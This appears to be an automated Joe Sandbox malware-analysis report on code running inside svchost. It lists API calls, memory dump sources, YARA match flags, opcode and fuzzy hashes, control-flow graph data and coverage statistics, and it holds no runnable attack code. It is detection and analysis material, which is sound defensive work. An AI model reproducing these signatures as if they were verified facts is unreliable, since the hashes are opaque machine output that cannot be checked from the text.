                                                                                                                                                                                                                                                                                                          • Opcode ID: 640abeb5c6b2b1bc35f62c2643cd99f43d88f06d202f511bb8515c624a1d4051
                                                                                                                                                                                                                                                                                                          • Instruction ID: dfbe970f5a7660aabce0ea9990549b81e5213e84709412647b3dab0a8f1632e4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 640abeb5c6b2b1bc35f62c2643cd99f43d88f06d202f511bb8515c624a1d4051
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36118730718D494FEA58AB6C9C8476672E5FB4A335F50063BE51FC22D2DB29AC46C340
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007DF426ABE150: NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,00007DF426ABC0F7), ref: 00007DF426ABE160
                                                                                                                                                                                                                                                                                                          • realloc.MSVCRT ref: 00007DF426AAFB59
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPortrealloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1589556540-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 404d992d80ce28f588e6575ef2a58a6672b7331dba98a01d15c19ea0354211cd
                                                                                                                                                                                                                                                                                                          • Instruction ID: c5e09677a827372295d50f008e5cd4e51f28f4bf5ee1eb2f24963498c08bef13
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 404d992d80ce28f588e6575ef2a58a6672b7331dba98a01d15c19ea0354211cd
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3018032B089454FF7A8A7B96CE837B69F5EF99261B100137E50FC3285EE28DE404281

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          control_flow_graph 520 1c276404ae0-1c276404b00 521 1c276404b02-1c276404b0c 520->521 522 1c276404b61 520->522 523 1c276404b0e-1c276404b1c 521->523 524 1c276404b40-1c276404b52 call 1c276409460 521->524 525 1c276404b63-1c276404b7a call 1c276409990 522->525 527 1c276404b1e-1c276404b2f 523->527 524->525 533 1c276404b54-1c276404b5f LoadLibraryA 524->533 530 1c276404b36-1c276404b3e 527->530 531 1c276404b31 527->531 530->524 530->527 531->530 533->525
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 947044025-0

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: closesocket
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2781271927-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateHeap
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 10892065-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressCallerProc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2663294120-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,00007DF426B2EF2F,?,?,?,?,00000000,00000000), ref: 00007DF426B1D689
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InfoSystem
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 31276548-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.1671053578.000001C276070000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C276070000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_1c276070000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: calloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2635317215-0

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007DF426ABE150: NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,00007DF426ABC0F7), ref: 00007DF426ABE160
                                                                                                                                                                                                                                                                                                          • malloc.MSVCRT ref: 00007DF426AADB44
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007DF426AB77EC: malloc.MSVCRT(?,?,?,?,?,FFFFFFFF,-00000001,-00000002,-00000001,00007DF426AD740A), ref: 00007DF426AB780B
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: malloc$AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1211516610-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2803490479-0

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: calloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2635317215-0

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1263568516-0

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • malloc.MSVCRT(?,?,?,?,?,FFFFFFFF,-00000001,-00000002,-00000001,00007DF426AD740A), ref: 00007DF426AB780B
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2803490479-0

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrcmpi
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: calloc
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • malloc.MSVCRT(?,?,?,?,-00000001,?,-00000001,00007DF426A96946), ref: 00007DF426A968FD
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free

Control-flow Graph (graph image not reproduced; legend: Executed, Not Executed)
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: calloc
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 803f3e239e71c094a11688905a13a5b4d70b1f6a51e1afa360838daebce55db3
                                                                                                                                                                                                                                                                                                          • Instruction ID: 926087f8737ea9f230ca05f2264e59f4c59066cce98378a11f580aa09d9a84c5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 803f3e239e71c094a11688905a13a5b4d70b1f6a51e1afa360838daebce55db3
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40D05E50B16D0D0FAB58A27E1C8912A31D5DBD81327484177B80DC2251EC19CC8582A0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 71969f7ba82f040737c07892c75cbb6ddbbd8e0156a438f90a0ebcf422641aac
                                                                                                                                                                                                                                                                                                          • Instruction ID: be4404b2bfaa0adbbf9e993e1fa40be2a7f85f6df42c8d88a1198aa7bbefaa10
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71969f7ba82f040737c07892c75cbb6ddbbd8e0156a438f90a0ebcf422641aac
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63E0EC3091595A8FEF89EB788D48BA632E4FB29314F940479C40AC72D4E6BDD984C781
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 18e477c43355e40e63571de48535b83294ddf8e770562ea63db4867f7ce24bd4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 726b9f7e1999859a4f95099476a86d4c13b7fad6a8aedaae967c0234dbe0bfc0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18e477c43355e40e63571de48535b83294ddf8e770562ea63db4867f7ce24bd4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1CD05E3060BD0B0BEF9CABEA48A963536E0DF69352720003E940BC1591CA19C851D314
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: a879d9cdda192066d0016720bfe52cb777deb1a8d88bb757dd441a7a6a3c5b79
                                                                                                                                                                                                                                                                                                          • Instruction ID: bb29cabb62062424e782dd6be97452204e0611a834de42c64549d7ef995f64be
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a879d9cdda192066d0016720bfe52cb777deb1a8d88bb757dd441a7a6a3c5b79
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EB01238D5FC9B07EE6C33760D6D0553560EFB6212FC401B5DC16C0050F50CC4944352
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.1674864872.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp, Offset: 000001C2782E0000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000F.00000003.1675987126.000001C2782E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_1c2782e0000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: 190237d2ffd9b392b33fbad128f10d8922b8ecb4362975056822984983953748
                                                                                                                                                                                                                                                                                                          • Instruction ID: c4baaa42edf10a998ba58b7de34015d84c5a7ad241ce47b62ca994584c44897e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 190237d2ffd9b392b33fbad128f10d8922b8ecb4362975056822984983953748
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4921A83674AB5447FB9A8B2DD4D4BF872905768B88F149050DE4973FD6D7BEC450C200
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: b5b40462eea7a53d4f43fef84958c55854cf61dddd4c725374532822cf4ebc6c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6b5de7765083f1fcecf79d76d96fc317e58b19ab22377307484a88b0d29399c3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5b40462eea7a53d4f43fef84958c55854cf61dddd4c725374532822cf4ebc6c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4B01122E2880082C2080E0AB802330F2B2C30B300F003030200AF3A20C8A0CC802ACF

                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                          Execution Coverage:3.5%
                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:28.8%
                                                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                                                          Total number of Nodes:326
                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:32
